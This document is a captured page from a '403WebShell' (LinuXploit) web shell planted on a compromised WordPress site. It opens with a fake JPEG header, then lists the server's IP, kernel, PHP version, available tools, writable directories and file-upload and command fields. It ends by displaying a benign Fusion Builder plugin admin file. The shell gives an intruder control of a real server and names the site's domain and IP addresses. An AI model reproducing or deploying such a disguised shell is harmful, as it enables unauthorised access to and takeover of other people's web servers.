????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 13.58.228.206
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/www.astacus.eu/wp-content/plugins/fusion-builder/inc/admin-screens/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www.astacus.eu/wp-content/plugins/fusion-builder/inc/admin-screens/addons.php
<div class="wrap about-wrap fusion-builder-wrap">

	<?php Fusion_Builder_Admin::header(); ?>

	<div class="fusion-builder-important-notice">
		<p class="about-description">
			<?php printf( __( 'The Fusion Builder plugin has been created with extensibility as a key factor. Creating add-ons for the Builder will extend the plugins functionality and provide users with with the tools to create even more dynamic and complex content and value added services. Generating an ecosystem to extend and evolve the Fusion Builder plugin will be easier than ever before, all ready to be purchased and used from the list below. To learn more about how to get involved by creating add-ons for the Fusion Builder please check out our <a href="%1$s" target="%2$s">developer documentation</a> and email us at <a href="%3$s">info@theme-fusion.com</a> to potentially be promoted here. ', 'fusion-builder' ), 'https://theme-fusion.com/support/documentation/fusion-builder-api-documentation/', '_blank', 'mailto:info@theme-fusion.com' ); ?>
		</p>
	</div>

	<div class="avada-registration-steps">

		<div class="feature-section theme-browser rendered fusion-builder-addons">
			<?php
			$addons_json = ( isset( $_GET['reset_transient'] ) ) ? false : get_site_transient( 'fusion_builder_addons_json' );
			if ( ! $addons_json ) {
				$response = wp_remote_get( 'http://updates.theme-fusion.com/fusion_builder_addon/', array(
					'timeout'    => 30,
					'user-agent' => 'fusion-builder',
				) );
				$addons_json  = wp_remote_retrieve_body( $response );
				set_site_transient( 'fusion_builder_addons_json', $addons_json, 300 );
			}
			$addons = json_decode( $addons_json, true );
			// Move coming_soon to the end.
			if ( isset( $addons['415041'] ) ) {
				$coming_soon = $addons['415041'];
				unset( $addons['415041'] );
				$addons['coming-soon'] = $coming_soon;
			}
			$n = 0;
			?>
			<?php foreach ( $addons as $id => $addon ) : ?>
				<div class="addon">
					<img class="addon-image" src="" data-src="<?php echo esc_url_raw( $addon['thumbnail'] ); ?>" <?php echo ( ! empty( $addon['retinaThumbnail'] ) ) ? 'data-src-retina="' . esc_url_raw( $addon['retinaThumbnail'] ) . '"' : ''; ?> />
					<noscript>
						<img src="<?php echo esc_url_raw( $addon['thumbnail'] ); ?>" />
					</noscript>
					<?php if ( 'coming-soon' !== $id ) : ?>
						<?php $url = add_query_arg( 'ref', 'ThemeFusion', $addon['url'] ); ?>
						<a href="<?php echo esc_url_raw( $url ); ?>" target="_blank"></a>
					<?php endif; ?>
				</div>
			<?php
				$n++;
				endforeach;
			?>
		</div>
		<script>
			jQuery( document ).ready( function() {
				var images = jQuery( '.addon-image' ),
					isRetina = window.devicePixelRatio > 1 ? true : false;
				jQuery.each( images, function( i, v ) {
					var imageSrc = ( 'undefined' !== typeof jQuery( this ).data( 'src-retina' ) && isRetina ) ? jQuery( this ).data( 'src-retina' ) : jQuery( this ).data( 'src' );
					jQuery( this ).attr( 'src', imageSrc );
				} );
			});
		</script>
	</div>
	<?php Fusion_Builder_Admin::footer(); ?>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit